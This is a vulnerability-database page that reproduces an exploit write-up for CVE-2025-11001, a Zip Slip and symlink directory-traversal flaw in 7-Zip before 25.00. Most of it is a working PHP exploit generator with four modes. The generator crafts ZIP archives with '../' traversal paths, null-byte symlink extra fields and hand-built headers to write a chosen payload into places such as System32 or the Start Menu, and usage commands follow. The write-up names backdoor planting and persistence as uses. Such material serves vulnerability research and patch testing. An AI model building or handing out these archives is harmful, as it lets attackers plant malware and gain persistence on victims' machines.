| Reporter | Title | Published | Views | Family All 56 |
|---|---|---|---|---|
| Exploit for CVE-2025-11001 | 20 Nov 202504:16 | â | githubexploit | |
| Exploit for CVE-2025-11001 | 22 Nov 202517:58 | â | githubexploit | |
| Exploit for CVE-2025-11001 | 24 Nov 202513:55 | â | githubexploit | |
| Exploit for CVE-2025-11001 | 14 Oct 202509:25 | â | githubexploit | |
| Exploit for Path Traversal in 7-Zip | 12 Dec 202516:49 | â | githubexploit | |
| Exploit for CVE-2025-11001 | 15 Oct 202512:14 | â | githubexploit | |
| Exploit for CVE-2025-11001 | 22 Nov 202510:13 | â | githubexploit | |
| 7-Zip < 25.00 | 23 Jul 202500:00 | â | nessus | |
| Amazon Linux 2023 : p7zip, p7zip-plugins (ALAS2023-2025-1250) | 28 Oct 202500:00 | â | nessus | |
| Amazon Linux 2023 : 7zip, 7zip-reduced, 7zip-standalone (ALAS2023-2025-1251) | 28 Oct 202500:00 | â | nessus |
=============================================================================================================================================
| # Title : 7-Zip 25.00 Zip Slip Symlink Directory Traversal Vulnerability |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://www.7-zip.org/ |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/211932/ & CVE-2025-11001
[+] Summary :
Multiple archive extraction implementations, including 7âZip versions prior to 25.00 and several ZIP libraries, improperly sanitize file paths during extraction.
An attacker can craft a malicious ZIP archive containing:
Directory traversal sequences (../../../)
Symlink entries
Manipulated extra fields
Nullâbyte terminated link targets
This allows files to be extracted outside the intended extraction folder and written to arbitrary locations on the victim system.
[+] Vulnerability Class :
Directory Traversal
Arbitrary File Write
Symlink Path Injection
Null-byte truncation bug
[+] Affected Software :
7âZip < 25.00 (Administrator-only exploitation on Windows)
Any ZIP extraction tool vulnerable to Zip Slip (Java, PHP, Python, WinRAR variants...)
Applications that use ZipArchive without proper sanitization
[+] Impact
A malicious ZIP archive allows an attacker to place files in arbitrary locations such as
C:\Windows\System32\
C:\ProgramData\Microsoft\Windows\Start Menu\
/etc/
/var/www/html/
[+] Possible consequences:
Backdoor planting
Privilege escalation
Persistence via startup folders
Overwriting sensitive files
Gaining remote execution depending on file location created
[+] Technical Details
[+] Core Exploit Mechanism
The attacker inserts filenames such as : ../../../../Windows/System32/evil.exe
or a symlink entry: evil.lnk â ../../../../Users/Public/Documents\0
These paths bypass validators in 7âZip and other ZIP extractors when running with elevated privileges.
poc
<?php
/*
===========================================================
By Indoushka (Nekaa Salah eddine)
===========================================================
*/
/* ===========================================================
MODE 1 â Basic Zip Slip Exploit
(Former: build_zip duplicated 4 times)
=========================================================== */
function poc_zip_slip($target_path, $payload_file, $output_zip)
{
if (!file_exists($payload_file)) { die("[-] Payload not found\n"); }
$payload_name = basename($payload_file);
$payload_data = file_get_contents($payload_file);
$target = trim(str_replace("\\", "/", $target_path), "/") . "/";
$traversal = "../../../../" . $target;
$zip = new ZipArchive();
if ($zip->open($output_zip, ZipArchive::CREATE | ZipArchive::OVERWRITE) !== TRUE) {
die("[-] Failed to create ZIP\n");
}
$zip->addFromString($traversal . $payload_name, $payload_data);
$zip->close();
echo "[+] PoC: Zip Slip ZIP created: $output_zip\n";
}
/* ===========================================================
MODE 2 â Manual Symlink ZIP Creator
=========================================================== */
function poc_symlink_zip($target_path, $output_zip)
{
$target = trim(str_replace("\\", "/", $target_path), "/") . "/";
$traversal = "../../../../" . $target;
$name = "evil.lnk";
$link = $traversal . "\x00";
$extra = pack("v", 0x756e);
$extra .= pack("v", strlen($link));
$extra .= $link;
$local = pack("VvvvvvVVVvv",
0x04034b50, 20, 0x800, 0x800, 0,0,0,0,0,
strlen($name), strlen($extra)
);
file_put_contents($output_zip, $local . $name . $extra);
echo "[+] PoC: Symlink ZIP created: $output_zip\n";
}
/* ===========================================================
MODE 3 â Full Manual ZIP Builder (Symlink + Payload)
=========================================================== */
function poc_manual_zip($target_path, $payload_file, $output_zip)
{
if (!file_exists($payload_file)) { die("[-] Missing payload\n"); }
$payload_name = basename($payload_file);
$payload_data = file_get_contents($payload_file);
$target = trim(str_replace("\\", "/", $target_path), "/") . "/";
$trav = "../../../../" . $target;
$ln_name = "evil.lnk";
$ln_target = $trav . "\x00";
$ln_extra = pack("v", 0x756e).pack("v",strlen($ln_target)).$ln_target;
$f = fopen($output_zip, "wb");
$off = 0;
// Local: Symlink
$h1 = pack("VvvvvvVVVvv",
0x04034b50,20,0x800,0x800,0,0,0,0,0,strlen($ln_name),strlen($ln_extra)
);
fwrite($f, $h1.$ln_name.$ln_extra);
$symlink_offset = $off;
$off += strlen($h1)+strlen($ln_name)+strlen($ln_extra);
// Local: Payload
$h2 = pack("VvvvvvVVVvv",
0x04034b50,20,0x800,0,0,0,0,strlen($payload_data),strlen($payload_data),
strlen($payload_name),0
);
fwrite($f, $h2.$payload_name.$payload_data);
$payload_offset = $off;
$off += strlen($h2)+strlen($payload_name)+strlen($payload_data);
// Central Directory
$cd_start = $off;
// CD: Symlink
$cd1 = pack("VvvvvvVVVvvvvvVV",
0x02014b50,0x0317,20,0x800,0,0,0,0,0,0,
strlen($ln_name),strlen($ln_extra),0,0,0,(0777<<16)|0xA1ED,$symlink_offset
);
fwrite($f, $cd1.$ln_name.$ln_extra);
// CD: Payload
$cd2 = pack("VvvvvvVVVvvvvvVV",
0x02014b50,0x0317,20,0x800,0,0,0,0,
strlen($payload_data),strlen($payload_data),
strlen($payload_name),0,0,0,0,(0777<<16),$payload_offset
);
fwrite($f, $cd2.$payload_name);
// EOCD
$eocd = pack("VvvvvVVv",
0x06054b50,0,0,2,2,$off,$cd_start,0
);
fwrite($f, $eocd);
fclose($f);
echo "[+] PoC: Manual ZIP generated: $output_zip\n";
}
/* ===========================================================
MODE 4 â CVEâ2025â11001 (7-Zip Directory Traversal)
=========================================================== */
function poc_cve_2025_11001($target, $payload, $output)
{
poc_manual_zip($target, $payload, $output);
echo "[+] CVE-2025-11001 Archive Ready\n";
}
/* ===========================================================
CLI Controller
=========================================================== */
if (php_sapi_name() == "cli")
{
$args = getopt("", [
"mode:",
"target:",
"payload::",
"output::"
]);
if (!isset($args["mode"])) {
die("Usage:\n
php exploit.php --mode=zip-slip --target=DIR --payload=file --output=out.zip
php exploit.php --mode=symlink --target=DIR --output=out.zip
php exploit.php --mode=manual --target=DIR --payload=file --output=out.zip
php exploit.php --mode=cve-2025-11001 --target=DIR --payload=file --output=exp.zip
");
}
$mode = $args["mode"];
$target = $args["target"] ?? null;
$payload= $args["payload"] ?? null;
$output = $args["output"] ?? "exploit.zip";
switch ($mode) {
case "zip-slip":
poc_zip_slip($target, $payload, $output);
break;
case "symlink":
poc_symlink_zip($target, $output);
break;
case "manual":
poc_manual_zip($target, $payload, $output);
break;
case "cve-2025-11001":
poc_cve_2025_11001($target, $payload, $output);
break;
default:
echo "Unknown mode.\n";
}
}
?>
Save as : poc.php
run : php poc.php
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation